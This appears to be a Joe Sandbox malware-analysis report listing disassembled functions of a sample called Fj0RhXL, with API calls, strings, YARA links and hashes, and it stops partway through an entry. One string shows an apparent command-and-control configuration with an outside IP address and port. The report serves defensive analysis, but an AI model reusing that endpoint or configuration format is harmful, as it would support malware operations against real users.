Function 03D9AEF4 Relevance: 10.6, APIs: 7, Instructions: 63threadCOMMON

Download Yara Rule

APIs

___set_flsgetvalue.LIBCMT ref: 03D9AF19
__calloc_crt.LIBCMT ref: 03D9AF25
__getptd.LIBCMT ref: 03D9AF32
CreateThread.KERNEL32(?,?,03D9AE8F,00000000,?,?), ref: 03D9AF69
GetLastError.KERNEL32(?,?,?,?,?,00000000), ref: 03D9AF73
_free.LIBCMT ref: 03D9AF7C
__dosmaperr.LIBCMT ref: 03D9AF87

Part of subcall function 03D9ADE6: __getptd_noexit.LIBCMT ref: 03D9ADE6

Memory Dump Source

Source File: 00000006.00000002.3622934207.0000000003D80000.00000040.00001000.00020000.00000000.sdmp, Offset: 03D80000, based on PE: true

Associated: 00000006.00000002.3622934207.0000000003DC6000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_3d80000_Fj0RhXL.jbxd

Yara matches

Similarity

API ID: CreateErrorLastThread___set_flsgetvalue__calloc_crt__dosmaperr__getptd__getptd_noexit_free
String ID:
API String ID: 155776804-0
Opcode ID: bd8a6aee792b7b9a41c71dc183f4f57a793226463b61a6bc0dd812128380b992
Instruction ID: d053632e10be7c1c62013a75ae60ac4e31f2d5797a00bf2059c56f80a94e9d5a
Opcode Fuzzy Hash: bd8a6aee792b7b9a41c71dc183f4f57a793226463b61a6bc0dd812128380b992
Instruction Fuzzy Hash: 0F110477204706AFFF15EFA99C40DAB77A8EF45770B10052AF9158E190EB31D80087B0

Function 02F0732B Relevance: 10.6, APIs: 7, Instructions: 63threadCOMMON

Download Yara Rule

APIs

___set_flsgetvalue.LIBCMT ref: 02F07350
__calloc_crt.LIBCMT ref: 02F0735C
__getptd.LIBCMT ref: 02F07369
CreateThread.KERNEL32(?,?,02F072C6,00000000,?,?), ref: 02F073A0
GetLastError.KERNEL32(?,?,?,?,?,00000000), ref: 02F073AA
_free.LIBCMT ref: 02F073B3
__dosmaperr.LIBCMT ref: 02F073BE

Part of subcall function 02F0721D: __getptd_noexit.LIBCMT ref: 02F0721D

Memory Dump Source

Source File: 00000006.00000002.3622068823.0000000002F00000.00000040.00001000.00020000.00000000.sdmp, Offset: 02F00000, based on PE: true

Associated: 00000006.00000002.3622068823.0000000002F1F000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_2f00000_Fj0RhXL.jbxd

Similarity

API ID: CreateErrorLastThread___set_flsgetvalue__calloc_crt__dosmaperr__getptd__getptd_noexit_free
String ID:
API String ID: 155776804-0
Opcode ID: 6d4e4ad57ca6bca4f484e34e5e8e3a253e5b3ee53cfd58685d57da0abba0d2e3
Instruction ID: 9cdc88bcc489672d359e79f8d30b2d8b2617cb94c81f4fab9c6986a1a09c380b
Opcode Fuzzy Hash: 6d4e4ad57ca6bca4f484e34e5e8e3a253e5b3ee53cfd58685d57da0abba0d2e3
Instruction Fuzzy Hash: 5E11A33254474AAFAB10BEA49CC0E5BB799EF447E0B400059FB14861C0DB71E510AEA0

Function 03D88910 Relevance: 10.5, APIs: 4, Strings: 2, Instructions: 42libraryloaderCOMMON

Download Yara Rule

APIs

GetModuleHandleW.KERNEL32(kernel32.dll,GetNativeSystemInfo,?,?,?,?,?,?,?,?,03D88A23), ref: 03D8893D
GetProcAddress.KERNEL32(00000000), ref: 03D88944
GetNativeSystemInfo.KERNEL32(?,?,?,?,?,?,?,?,?,03D88A23), ref: 03D88952
GetSystemInfo.KERNEL32(?,?,?,?,?,?,?,?,?,03D88A23), ref: 03D8895A

Strings

kernel32.dll, xrefs: 03D8891D
GetNativeSystemInfo, xrefs: 03D88918

Memory Dump Source

Source File: 00000006.00000002.3622934207.0000000003D80000.00000040.00001000.00020000.00000000.sdmp, Offset: 03D80000, based on PE: true

Associated: 00000006.00000002.3622934207.0000000003DC6000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_3d80000_Fj0RhXL.jbxd

Yara matches

Similarity

API ID: InfoSystem$AddressHandleModuleNativeProc
String ID: GetNativeSystemInfo$kernel32.dll
API String ID: 3433367815-192647395
Opcode ID: 50b9d9812d2138cc37edb4840b649869d7f9a0e0944b8366203fe20465279e3a
Instruction ID: ccd67a33a1141a4ce9b34d8f87fd2e9414a0a8cb0afb04998d6f10b368f572db
Opcode Fuzzy Hash: 50b9d9812d2138cc37edb4840b649869d7f9a0e0944b8366203fe20465279e3a
Instruction Fuzzy Hash: 9D012CB1D00209DFCB50FFB4C9456EEBBF4EB08600F5049A9D51AF3245EA759A00CB62

Function 03D9AE8F Relevance: 10.5, APIs: 7, Instructions: 34threadCOMMON

Download Yara Rule

APIs

___set_flsgetvalue.LIBCMT ref: 03D9AE95

Part of subcall function 03DA288A: TlsGetValue.KERNEL32(00000000,03DA29E3,?,03D9FCE2,00000000,00000001,00000000,?,03DA8D2E,00000018,03DB79F0,0000000C,03DA8DBE,00000000,00000000), ref: 03DA2893
Part of subcall function 03DA288A: DecodePointer.KERNEL32(?,03D9FCE2,00000000,00000001,00000000,?,03DA8D2E,00000018,03DB79F0,0000000C,03DA8DBE,00000000,00000000,?,03DA2AF0,0000000D), ref: 03DA28A5
Part of subcall function 03DA288A: TlsSetValue.KERNEL32(00000000,?,03D9FCE2,00000000,00000001,00000000,?,03DA8D2E,00000018,03DB79F0,0000000C,03DA8DBE,00000000,00000000,?,03DA2AF0), ref: 03DA28B4

___fls_getvalue@4.LIBCMT ref: 03D9AEA0

Part of subcall function 03DA286A: TlsGetValue.KERNEL32(?,?,03D9AEA5,00000000), ref: 03DA2878

___fls_setvalue@8.LIBCMT ref: 03D9AEB3

Part of subcall function 03DA28BE: DecodePointer.KERNEL32(?,?,?,03D9AEB8,00000000,?,00000000), ref: 03DA28CF

GetLastError.KERNEL32(00000000,?,00000000), ref: 03D9AEBC
ExitThread.KERNEL32 ref: 03D9AEC3
GetCurrentThreadId.KERNEL32 ref: 03D9AEC9
__freefls@4.LIBCMT ref: 03D9AEE9

Memory Dump Source

Source File: 00000006.00000002.3622934207.0000000003D80000.00000040.00001000.00020000.00000000.sdmp, Offset: 03D80000, based on PE: true

Associated: 00000006.00000002.3622934207.0000000003DC6000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_3d80000_Fj0RhXL.jbxd

Yara matches

Similarity

API ID: Value$DecodePointerThread$CurrentErrorExitLast___fls_getvalue@4___fls_setvalue@8___set_flsgetvalue__freefls@4
String ID:
API String ID: 2383549826-0
Opcode ID: 25ec825fb7b3e5fae7fcdb4ea25b50af37eb57f1d928fe2c5a2261e5d0e6cfbd
Instruction ID: 15c0b8a28152c94207ec4afb5baa540a39db591e3a1c486b79c7b3a028e7304d
Opcode Fuzzy Hash: 25ec825fb7b3e5fae7fcdb4ea25b50af37eb57f1d928fe2c5a2261e5d0e6cfbd
Instruction Fuzzy Hash: BAF06D7A901B05EFDB08FF76CA0884E7BA8EF483443208D55F844CB315EA35D8428AB1

Function 02F072C6 Relevance: 10.5, APIs: 7, Instructions: 34threadCOMMON

Download Yara Rule

APIs

___set_flsgetvalue.LIBCMT ref: 02F072CC

Part of subcall function 02F09823: TlsGetValue.KERNEL32(00000000,02F0997C,?,02F0A080,00000000,00000001,00000000,?,02F0C1E0,00000018,02F17BF0,0000000C,02F0C270,00000000,00000000), ref: 02F0982C
Part of subcall function 02F09823: DecodePointer.KERNEL32(?,02F0A080,00000000,00000001,00000000,?,02F0C1E0,00000018,02F17BF0,0000000C,02F0C270,00000000,00000000,?,02F09A89,0000000D), ref: 02F0983E
Part of subcall function 02F09823: TlsSetValue.KERNEL32(00000000,?,02F0A080,00000000,00000001,00000000,?,02F0C1E0,00000018,02F17BF0,0000000C,02F0C270,00000000,00000000,?,02F09A89), ref: 02F0984D

___fls_getvalue@4.LIBCMT ref: 02F072D7

Part of subcall function 02F09803: TlsGetValue.KERNEL32(?,?,02F072DC,00000000), ref: 02F09811

___fls_setvalue@8.LIBCMT ref: 02F072EA

Part of subcall function 02F09857: DecodePointer.KERNEL32(?,?,?,02F072EF,00000000,?,00000000), ref: 02F09868

GetLastError.KERNEL32(00000000,?,00000000), ref: 02F072F3
ExitThread.KERNEL32 ref: 02F072FA
GetCurrentThreadId.KERNEL32 ref: 02F07300
__freefls@4.LIBCMT ref: 02F07320

Memory Dump Source

Source File: 00000006.00000002.3622068823.0000000002F00000.00000040.00001000.00020000.00000000.sdmp, Offset: 02F00000, based on PE: true

Associated: 00000006.00000002.3622068823.0000000002F1F000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_2f00000_Fj0RhXL.jbxd

Similarity

API ID: Value$DecodePointerThread$CurrentErrorExitLast___fls_getvalue@4___fls_setvalue@8___set_flsgetvalue__freefls@4
String ID:
API String ID: 2383549826-0
Opcode ID: 0b2dea12d985b07be13e4d39fc6768c2633cb6b9eb7a7a292a7a079876fda2eb
Instruction ID: 395f8ce06925940227130a5bfeea30191fbbf33a6bb9bd74d6acd85bffb185de
Opcode Fuzzy Hash: 0b2dea12d985b07be13e4d39fc6768c2633cb6b9eb7a7a292a7a079876fda2eb
Instruction Fuzzy Hash: 88F03674900205AFD704BFB1CD94D4EBBEAAF84BC0791C454EA058B392EB74E442EF95

Function 6C39FAA9 Relevance: 9.3, APIs: 2, Strings: 3, Instructions: 599COMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 6C39FB76
_sprintf.LIBCMT ref: 6C39FBFB

Strings

%s,%s, xrefs: 6C39FBF0
Please call swe_set_ephe_path() or swe_set_jplfile() before calling swe_fixstar() or swe_fixstar_ut(), xrefs: 6C39FB24
, xrefs: 6C39FFB2

Memory Dump Source

Source File: 00000006.00000002.3623600753.000000006C351000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C350000, based on PE: true

Associated: 00000006.00000002.3623582983.000000006C350000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.3623659645.000000006C3FD000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.3623695592.000000006C447000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.3623715559.000000006C449000.00000008.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.3623742172.000000006C46D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.3623760984.000000006C46E000.00000008.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.3623779733.000000006C470000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.3623779733.000000006C473000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.3623779733.000000006C478000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.3623779733.000000006C47C000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.3623779733.000000006C47E000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.3623779733.000000006C480000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.3623887245.000000006C483000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_6c350000_Fj0RhXL.jbxd

Similarity

API ID: _memset_sprintf
String ID: $%s,%s$Please call swe_set_ephe_path() or swe_set_jplfile() before calling swe_fixstar() or swe_fixstar_ut()
API String ID: 1557529856-1540576256
Opcode ID: 4b1c769ca105f499d8681c8c56abd914f851e3ac7e151d2eb4de9f3a810707b1
Instruction ID: b8ebb72b381d9e198f15c304f2f38475f558ee400fa5b20fba734bdbba44fbb8
Opcode Fuzzy Hash: 4b1c769ca105f499d8681c8c56abd914f851e3ac7e151d2eb4de9f3a810707b1
Instruction Fuzzy Hash: 3122F272E0060DDBDF10EF94D884BDD7774FF09308F118599E89966690EB329AA8CF91

Function 03D87780 Relevance: 9.1, APIs: 6, Instructions: 86processCOMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 03D877AC
CreateToolhelp32Snapshot.KERNEL32(00000002,00000000,?,?,00000000), ref: 03D877B8
Process32FirstW.KERNEL32(00000000,00000000), ref: 03D877E9
Process32NextW.KERNEL32(00000000,0000022C), ref: 03D8783F
CloseHandle.KERNEL32(00000000,?,?,00000000), ref: 03D87846

Memory Dump Source

Source File: 00000006.00000002.3622934207.0000000003D80000.00000040.00001000.00020000.00000000.sdmp, Offset: 03D80000, based on PE: true

Associated: 00000006.00000002.3622934207.0000000003DC6000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_3d80000_Fj0RhXL.jbxd

Yara matches

Similarity

API ID: Process32$CloseCreateFirstHandleNextSnapshotToolhelp32_memset
String ID:
API String ID: 2526126748-0
Opcode ID: 0f09731e1a37c5383eb71ffa7d0c624af942c8f766d69131be1963d31e5f1209
Instruction ID: 4fbd0cbd3e75891392700c1be987732b84dae3ca71251e5d5c22f2404c2a3579
Opcode Fuzzy Hash: 0f09731e1a37c5383eb71ffa7d0c624af942c8f766d69131be1963d31e5f1209
Instruction Fuzzy Hash: 5F21BA32610114DBDB20FF74EC89BEDB3B9EF18710F640AD9D80996280FB31AA45C691

Function 02F032D0 Relevance: 9.0, APIs: 6, Instructions: 32synchronizationsleepCOMMON

Download Yara Rule

APIs

WaitForSingleObject.KERNEL32(?,000000FF), ref: 02F032E1
Sleep.KERNEL32(00000258), ref: 02F032EE
InterlockedExchange.KERNEL32(?,00000000), ref: 02F032F6
WaitForSingleObject.KERNEL32(?,000000FF), ref: 02F03302
WaitForSingleObject.KERNEL32(?,000000FF), ref: 02F0330A
Sleep.KERNEL32(0000012C), ref: 02F0331B

Memory Dump Source

Source File: 00000006.00000002.3622068823.0000000002F00000.00000040.00001000.00020000.00000000.sdmp, Offset: 02F00000, based on PE: true

Associated: 00000006.00000002.3622068823.0000000002F1F000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_2f00000_Fj0RhXL.jbxd

Similarity

API ID: ObjectSingleWait$Sleep$ExchangeInterlocked
String ID:
API String ID: 3137405945-0
Opcode ID: e1e793c5d0a59bc205f359f4bea499fe9843583eca6f81d76be8821bcb4e3bac
Instruction ID: ac98a4983a8e0144fcc01f3662216f18f329101e3946f95aef9c6461d63a0460
Opcode Fuzzy Hash: e1e793c5d0a59bc205f359f4bea499fe9843583eca6f81d76be8821bcb4e3bac
Instruction Fuzzy Hash: 54F082722443086FD610EBE9DC84E46F3B8AFC5770B614B09F221872D0CAB0E8018BA0

Function 6C39F7DA Relevance: 9.0, APIs: 2, Strings: 3, Instructions: 209COMMON

Download Yara Rule

Strings

,%s, xrefs: 6C39F9CC
.;C:\Astrolog\, xrefs: 6C39F82C, 6C39F831, 6C39F84B
NULL, xrefs: 6C39F832

Memory Dump Source

Source File: 00000006.00000002.3623600753.000000006C351000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C350000, based on PE: true

Associated: 00000006.00000002.3623582983.000000006C350000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.3623659645.000000006C3FD000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.3623695592.000000006C447000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.3623715559.000000006C449000.00000008.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.3623742172.000000006C46D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.3623760984.000000006C46E000.00000008.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.3623779733.000000006C470000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.3623779733.000000006C473000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.3623779733.000000006C478000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.3623779733.000000006C47C000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.3623779733.000000006C47E000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.3623779733.000000006C480000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.3623887245.000000006C483000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_6c350000_Fj0RhXL.jbxd

Similarity

API ID:
String ID: ,%s$.;C:\Astrolog\$NULL
API String ID: 0-2992153177
Opcode ID: 1e75dfbc3494208d6e050590a610f769720be5cd7640d450568c86d603c6870f
Instruction ID: a900feba6910aed501b44998bf38c1d024f4a4fd0dffff1e146a8df7eb3319e4
Opcode Fuzzy Hash: 1e75dfbc3494208d6e050590a610f769720be5cd7640d450568c86d603c6870f
Instruction Fuzzy Hash: F071F97190A16A5FCB11DF389C94BD9B7B8AB09318F2406F9E094D3691FB319A898F01

Function 03D87BC0 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 110comCOMMON

Download Yara Rule

APIs

CoInitialize.OLE32(00000000), ref: 03D87BCB
CoCreateInstance.OLE32(03DB503C,00000000,00000001,03DB505C,?,?,?,?,?,?,?,?,?,?,03D85FAD), ref: 03D87BE2
SysFreeString.OLEAUT32(?), ref: 03D87C7C
CoUninitialize.OLE32(?,?,?,?,?,?,?,?,?,03D85FAD), ref: 03D87CAD

Strings

FriendlyName, xrefs: 03D87C6B

Memory Dump Source

Source File: 00000006.00000002.3622934207.0000000003D80000.00000040.00001000.00020000.00000000.sdmp, Offset: 03D80000, based on PE: true

Associated: 00000006.00000002.3622934207.0000000003DC6000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_3d80000_Fj0RhXL.jbxd

Yara matches

Similarity

API ID: CreateFreeInitializeInstanceStringUninitialize
String ID: FriendlyName
API String ID: 841178590-3623505368
Opcode ID: 2ff6ef01a5a6d642ff3ccff207dbdcaef2b1ba4c053d45f6c661584ac22eeb96
Instruction ID: 048f2ab86f72978b37cf9979e9f8c341716121b646064531d24c3c740e958e04
Opcode Fuzzy Hash: 2ff6ef01a5a6d642ff3ccff207dbdcaef2b1ba4c053d45f6c661584ac22eeb96
Instruction Fuzzy Hash: 2E313A76700209EFDB00EBA9DC80EAEB7B9EF89700F148594F505EB254DB71E905CB60

Function 6C35404F Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 74windowCOMMON

Download Yara Rule

APIs

Part of subcall function 6C371472: _sprintf.LIBCMT ref: 6C3714BC
Part of subcall function 6C371472: _sprintf.LIBCMT ref: 6C3714E0

__CxxThrowException@8.LIBCMT ref: 6C3540AA

Part of subcall function 6C3E0FF1: KiUserExceptionDispatcher.NTDLL(?,?,6C3D5E3B,?,?,?,?,?,6C3D5E3B,?,6C442DBC,6C470A30), ref: 6C3E1033

_memset.LIBCMT ref: 6C3540C4
GetModuleFileNameA.KERNEL32(00000000,?,000000FF), ref: 6C3540D9
MessageBoxA.USER32(00000000,GameBegin,00000000,00000000), ref: 6C3540F4

Part of subcall function 6C3B2A72: SHDeleteKeyA.SHLWAPI(80000001,Software\Classes\.as,?,?,6C3ADE40), ref: 6C3B2A85
Part of subcall function 6C3B2A72: SHDeleteKeyA.SHLWAPI(80000001,Software\Classes\Astrolog.as,?,?,6C3ADE40), ref: 6C3B2A91

Part of subcall function 6C3665F4: _memset.LIBCMT ref: 6C36662D
Part of subcall function 6C3665F4: _memset.LIBCMT ref: 6C366643

Part of subcall function 6C366B34: _memset.LIBCMT ref: 6C366B68

Part of subcall function 6C3D2E33: _doexit.LIBCMT ref: 6C3D2E3F

Strings

GameBegin, xrefs: 6C3540EE

Memory Dump Source

Source File: 00000006.00000002.3623600753.000000006C351000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C350000, based on PE: true

Associated: 00000006.00000002.3623582983.000000006C350000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.3623659645.000000006C3FD000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.3623695592.000000006C447000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.3623715559.000000006C449000.00000008.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.3623742172.000000006C46D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.3623760984.000000006C46E000.00000008.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.3623779733.000000006C470000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.3623779733.000000006C473000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.3623779733.000000006C478000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.3623779733.000000006C47C000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.3623779733.000000006C47E000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.3623779733.000000006C480000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.3623887245.000000006C483000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_6c350000_Fj0RhXL.jbxd

Similarity

API ID: _memset$Delete_sprintf$DispatcherExceptionException@8FileMessageModuleNameThrowUser_doexit
String ID: GameBegin
API String ID: 2408732992-2407867525
Opcode ID: 3c4fbb30cd65917b31408c055be6bd9df96db2abe62718781812027b31e0af95
Instruction ID: 81729a5a974b29f01fc6c1fcf5e17035053537ceba3157692f16f2d82a890d84
Opcode Fuzzy Hash: 3c4fbb30cd65917b31408c055be6bd9df96db2abe62718781812027b31e0af95
Instruction Fuzzy Hash: AA21C8B0A012489FDF14EF728881DEDB6B8E71934DBA0043AE15593E45DB3585689FA3

Function 03D9ABD2 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 41COMMONLIBRARYCODE

Download Yara Rule

APIs

_malloc.LIBCMT ref: 03D9ABEC

Part of subcall function 03D9AB3E: __FF_MSGBANNER.LIBCMT ref: 03D9AB57
Part of subcall function 03D9AB3E: __NMSG_WRITE.LIBCMT ref: 03D9AB5E
Part of subcall function 03D9AB3E: RtlAllocateHeap.NTDLL(00000000,00000001,00000001,00000000,00000000,?,03D9FCE2,00000000,00000001,00000000,?,03DA8D2E,00000018,03DB79F0,0000000C,03DA8DBE), ref: 03D9AB83

std::exception::exception.LIBCMT ref: 03D9AC21
std::exception::exception.LIBCMT ref: 03D9AC3B
__CxxThrowException@8.LIBCMT ref: 03D9AC4C

Strings

bad allocation, xrefs: 03D9AC1A

Memory Dump Source

Source File: 00000006.00000002.3622934207.0000000003D80000.00000040.00001000.00020000.00000000.sdmp, Offset: 03D80000, based on PE: true

Associated: 00000006.00000002.3622934207.0000000003DC6000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_3d80000_Fj0RhXL.jbxd

Yara matches

Similarity

API ID: std::exception::exception$AllocateException@8HeapThrow_malloc
String ID: bad allocation
API String ID: 615853336-2104205924
Opcode ID: 706e7de1eabd2d9e812223c0766dea85538c148147047dec39e33261e2a8df89
Instruction ID: cb4e43a0a1100f0f0b632cf12e3d71254eda5584ec03c902151e6a73cc33e217
Opcode Fuzzy Hash: 706e7de1eabd2d9e812223c0766dea85538c148147047dec39e33261e2a8df89
Instruction Fuzzy Hash: F6F0F47B52031AABEF15FB69D820EAD76F9FF40608F14045BE416AB182DB70CA4597A0

Function 02F07027 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 41COMMON

Download Yara Rule

APIs

_malloc.LIBCMT ref: 02F07041

Part of subcall function 02F06F93: __FF_MSGBANNER.LIBCMT ref: 02F06FAC
Part of subcall function 02F06F93: __NMSG_WRITE.LIBCMT ref: 02F06FB3
Part of subcall function 02F06F93: RtlAllocateHeap.NTDLL(00000000,00000001,00000001,00000000,00000000,?,02F0A080,00000000,00000001,00000000,?,02F0C1E0,00000018,02F17BF0,0000000C,02F0C270), ref: 02F06FD8

std::exception::exception.LIBCMT ref: 02F07076
std::exception::exception.LIBCMT ref: 02F07090
__CxxThrowException@8.LIBCMT ref: 02F070A1

Strings

bad allocation, xrefs: 02F0706F

Memory Dump Source

Source File: 00000006.00000002.3622068823.0000000002F00000.00000040.00001000.00020000.00000000.sdmp, Offset: 02F00000, based on PE: true

Associated: 00000006.00000002.3622068823.0000000002F1F000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_2f00000_Fj0RhXL.jbxd

Similarity

API ID: std::exception::exception$AllocateException@8HeapThrow_malloc
String ID: bad allocation
API String ID: 615853336-2104205924
Opcode ID: 61fdbd9ba64057525445389e4fd53de5263845125cf37029c9c4d14c278d4d2b
Instruction ID: e00e466ee7a969f81352b03c789acba9356bfc057124a776ae1e35f3ab2495a8
Opcode Fuzzy Hash: 61fdbd9ba64057525445389e4fd53de5263845125cf37029c9c4d14c278d4d2b
Instruction Fuzzy Hash: 35F02D31E0028D9ADB04FB95DD80E5EF7AB5B40BD4F500059DB05D60D0DBB0E650EF94

Function 02F06450 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 32stringsynchronizationthreadCOMMON

Download Yara Rule

APIs

lstrlenW.KERNEL32(?), ref: 02F06461

Part of subcall function 02F05E30: _memset.LIBCMT ref: 02F05E61

CreateThread.KERNEL32(00000000,00000000,02F06110,00000000,00000000,00000000), ref: 02F0648E
WaitForSingleObject.KERNEL32(00000000,000000FF), ref: 02F0649C
CloseHandle.KERNEL32(?), ref: 02F064A9

Strings

|p1:45.201.245.153|o1:80|t1:1|p2:45.201.245.153|o2:80|t2:1|p3:127.0.0.1|o3:80|t3:1|dd:1|cl:1|fz:, xrefs: 02F0646D

Memory Dump Source

Source File: 00000006.00000002.3622068823.0000000002F00000.00000040.00001000.00020000.00000000.sdmp, Offset: 02F00000, based on PE: true

Associated: 00000006.00000002.3622068823.0000000002F1F000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_2f00000_Fj0RhXL.jbxd

Similarity

API ID: CloseCreateHandleObjectSingleThreadWait_memsetlstrlen
String ID: |p1:45.201.245.153|o1:80|t1:1|p2:45.201.245.153|o2:80|t2:1|p3:127.0.0.1|o3:80|t3:1|dd:1|cl:1|fz:
API String ID: 1730619010-4171861867
Opcode ID: c36cedb35e40ead32920124f07d83d46102ae359b2f275f64e056a307373fc74
Instruction ID: d4b30d51e96d849a16cf35ffd071ef241462eefd1eb684d881458ea7ecff208b
Opcode Fuzzy Hash: c36cedb35e40ead32920124f07d83d46102ae359b2f275f64e056a307373fc74
Instruction Fuzzy Hash: 2EF08231D8161DBBE7105BD0AC4EF96B76CAB08FE1FD20910F7099A1C5CBB061208BA5

Function 02F02D00 Relevance: 7.5, APIs: 5, Instructions: 36COMMON

Download Yara Rule

APIs

setsockopt.WS2_32(?,0000FFFF,00000080,?,00000004), ref: 02F02D2C
CancelIo.KERNEL32(?), ref: 02F02D36
InterlockedExchange.KERNEL32(00000000,00000000), ref: 02F02D3F
closesocket.WS2_32(?), ref: 02F02D49
SetEvent.KERNEL32(00000001), ref: 02F02D53

Memory Dump Source

Source File: 00000006.00000002.3622068823.0000000002F00000.00000040.00001000.00020000.00000000.sdmp, Offset: 02F00000, based on PE: true

Associated: 00000006.00000002.3622068823.0000000002F1F000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_2f00000_Fj0RhXL.jbxd

Similarity

API ID: CancelEventExchangeInterlockedclosesocketsetsockopt
String ID:
API String ID: 1486965892-0
Opcode ID: 2059fc1cbb882312602514fe87fcc3ff98f0ca619ba269e27abe5a26d6a3f6ec
Instruction ID: e075c5372da4c05317a11ffeb561871f19a99a8ef4bd549ee92b8d7dd3e28da4
Opcode Fuzzy Hash: 2059fc1cbb882312602514fe87fcc3ff98f0ca619ba269e27abe5a26d6a3f6ec
Instruction Fuzzy Hash: 23F04F76940708AFD330DF94DC49F56B7B8FB89B51F904A59F68297680C7B0B9048BA0

Function 03D811B0 Relevance: 6.1, APIs: 4, Instructions: 76memoryCOMMON

Download Yara Rule

APIs

__floor_pentium4.LIBCMT ref: 03D811E9
VirtualAlloc.KERNEL32(00000000,?,00001000,00000004), ref: 03D81226
_memmove.LIBCMT ref: 03D81242
VirtualFree.KERNELBASE(?,00000000,00008000), ref: 03D81255

Memory Dump Source

Source File: 00000006.00000002.3622934207.0000000003D80000.00000040.00001000.00020000.00000000.sdmp, Offset: 03D80000, based on PE: true

Associated: 00000006.00000002.3622934207.0000000003DC6000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_3d80000_Fj0RhXL.jbxd

Yara matches

Similarity

API ID: Virtual$AllocFree__floor_pentium4_memmove
String ID:
API String ID: 1828152804-0
Opcode ID: 9f6647e31bf256ed999d8fb68615ecd2ef7a567d73b1f71f5a2d9779c27cfc1c
Instruction ID: c86915aae15b3a3b722aa8e971745d301277a5d93772ef38d9c0b9fa42d8f4dc
Opcode Fuzzy Hash: 9f6647e31bf256ed999d8fb68615ecd2ef7a567d73b1f71f5a2d9779c27cfc1c
Instruction Fuzzy Hash: 6E219271A00709ABDB14EFA9D945B6EB7F8EF44B05F0085A9E849D2640E631B9148750

Function 03D81100 Relevance: 6.1, APIs: 4, Instructions: 66memoryCOMMON

Download Yara Rule

APIs

